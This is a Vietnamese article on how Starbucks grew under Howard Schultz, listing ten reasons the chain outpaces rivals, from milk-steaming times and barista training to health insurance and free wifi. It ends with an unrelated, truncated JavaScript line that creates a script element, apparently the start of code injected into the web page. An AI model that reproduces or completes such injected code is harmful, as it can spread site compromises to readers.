Ngày mùng 7 tháng 9 năm 1982, Howard Schultz bắt đầu làm việc cho Công ty Starbucks với vai trò là nhân viên tiếp thị tại khu chợ Pike, thành phố Seattle, Mỹ. Sau chuyến công tác sang Mi lan và Verona, ông hiểu ra rằng một tiệm café muốn thành công thì không được dừng lại ở việc chỉ bán café hạt và café xay. Nhưng vì ông chủ Starbucks bấy giờ sẽ không bao giờ thay đổi để làm theo ý tưởng của Howard nên ông quyết định rời Starbucks và mở công ty riêng. Năm 1987, Howard mua đứt và chính thức trở thành CEO của Starbucks. Điều gì khiến Starbucks vượt mặt các đối thủ cạnh tranh khác
Tính đến thời điểm hiện tại, Starbucks đã có tới 16.000 cửa hàng trên toàn thế giới. Sự thành công của Starbucks khiến nhiều người phải ghen tị. Tuy nhiên chúng ta phải biết rằng một Công ty dù lớn mạnh đến đâu thì cũng đều bắt đầu từ những thứ bé nhỏ. Với những ai muốn phát triển doanh nghiệp của mình thì Starbucks sẽ là một tấm gương sáng để noi theo. Cùng khám phá 10 lý do khiến Starbucks vượt mặt các đối thủ cạnh tranh:
1. Với hai quầy thanh toán cùng đội ngũ nhân viên làm việc toàn thời gian, Starbucks có thể phục vụ tới 220 khách/giờ
2. “Chúng tôi sẽ phục vụ khách hàng trong vòng 3 phút kể từ khi họ bước vào cửa hàng của chúng tôi, và tối đa là 5 phút nếu cửa hàng quá đông khách” – một Giám đốc làm việc lâu năm cho Starbucks cho hay
3. Nhân viên ở Starbucks biết rõ sự khác biệt giữa 1 ly Cappuccino và 1 ly Latte
Starbucks phục vụ khách hàng những thức uống làm đúng quy cách nhất, trong khi nhiều cửa hàng cà phê khác lại thường làm giả chúng.
Ở Starbucks, một ly Cappuccino là sự kết hợp giữa 1 lượng vừa đủ Espresso (Cà phê được pha bằng cách dùng nước nóng nén dưới áp suất cao qua bột cà phê xay rất nhuyễn) thêm vào đó là 1 phần sữa nóng (sữa được hấp nóng bằng hơi nước) và 1 phần là bọt sữa. Một ly Latte cũng tương tự như Cappuccino gồm có: Espresso, sữa nóng, bọt sữa nhưng lượng bọt sữa ở ly Latte thì ít hơn và mỏng hơn so với ly Cappuccino.
Để làm một ly Cappuccino, chuyên gia pha chế phải hấp sữa bằng hơi nước trong 6 – 8 giây còn sữa để pha Latte chỉ cần hấp trong 3-5 giây. Nhân viên cũng phải điều chỉnh nhiệt độ khi hấp sữa sao cho đồ uống sẽ giữ ở nhiệt độ khoảng 74°C và không bao giờ được vượt quá mức 82°C khi mang ra phục vụ khách hàng.
Để được công nhận là một chuyên gia pha chế, ứng viên phải biết pha một ly Cappuccino hoàn hảo. Điều này sẽ được đánh giá nhờ cân điện tử hoặc dùng cốc đo lường.
4. Starbucks không bao giờ phục vụ khách cà phê để quá 30 phút không được quấy
Mỗi chuyên viên pha chế phải quản lý tới bốn khay cà phê cùng lúc và cứ ít nhất 15 phút lại quấy một lần. Họ không bao giờ cho phép một ly cà phê để quá 30 phút mà không được quấy. Họ phải làm điều này ngay cả trong giờ nghỉ. Starbucks thà đổ cà phê đi chứ không phục vụ khách hàng một ly cà phê nguội.
Các chuyên gia pha chế cũng đặt chế độ hẹn giờ cho cà phê đá, trà đá và bánh ngọt để đảm bảo rằng tất cả mọi thứ đều phải tươi ngon khi đem ra phục vụ khách.
5. Cửa hàng tuyên bố phục vụ 87.000 cách kết hợp đồ uống khác nhau, các chuyên gia pha chế chẳng ngần ngại làm việc này cho khách
Làm sao họ có thể làm được điều này? Các chuyên viên pha chế của Starbucks phải trải qua hơn 30 giờ đào tạo về tất cả mọi thứ từ kỹ thuật pha Frappuccino đến nguồn gốc hạt cà phê.
Các bài đào tạo bao gồm: Ấn tượng đầu tiên và dịch vụ khách hàng; Kinh nghiệm làm việc ở Starbucks; Pha chế và thưởng thức café; Quầy Espresso cơ bản; Đồ ăn và cách hâm nóng; Các loai đồ uống căn bản, đồ uống lạnh, café; Bài thanh toán POS; Chuẩn bị đồ uống; Dịch vụ khách hàng cơ bản là café: rang và đống gói
6. Hầu hết các cửa hàng của Starbucks đều nâng cấp máy móc lên loại máy Mastrena của Thuỵ Sỹ chất lượng cao và cho phép làm ra café hơi (Espresso) liên tục
Máy Mastrena giúp việc kéo tia café Espresso chuẩn xác và dễ dàng hơn. Nó cũng thấp hơn và vì thế nhân viên pha chế có thể trao đổi với khách hàng dễ dàng hơn.
Tuy nhiên, dòng máy Mastrena lại rất hiếm và khó tìm.
7. Starbucks lựa chọn máy pha café đơn Clover
Máy có thể pha ra loại café ngon nhất mà bạn đã từng được thưởng thức. Starbucks đã mua lại các Công ty sản xuất ra máy Clover vào năm 2008 và bắt đầu giới thiệu loại máy này tại 1 số cửa hàng chọn lọc trên toàn nước Mỹ.
8. Bất kì chuyên gia pha chế nào của Starbucks mà làm việc nhiều hơn 20 tiếng/ tuần thì đều nhận được bảo hiểm y tế
Điều này khiến cho nhân viên Starbucks làm việc với thái độ vui vẻ và thân thiện.
Tuy nhiên bảo hiểm y tế lại vô cùng đắt đỏ. Năm 2008, bảo hiểm y tế đã ngốn tới 250 triệu đô của Starbucks – Schultz tiết lộ trên báo Seattle Times.
9. Starbucks cho phép khách có thể thanh toán bằng Iphone hoặc Blackberry
10. Starbucks lắp đặt mạng wifi miễn phí cho khách sử dụng thoải mái
var d=document;var s=d.createElement(‘script’);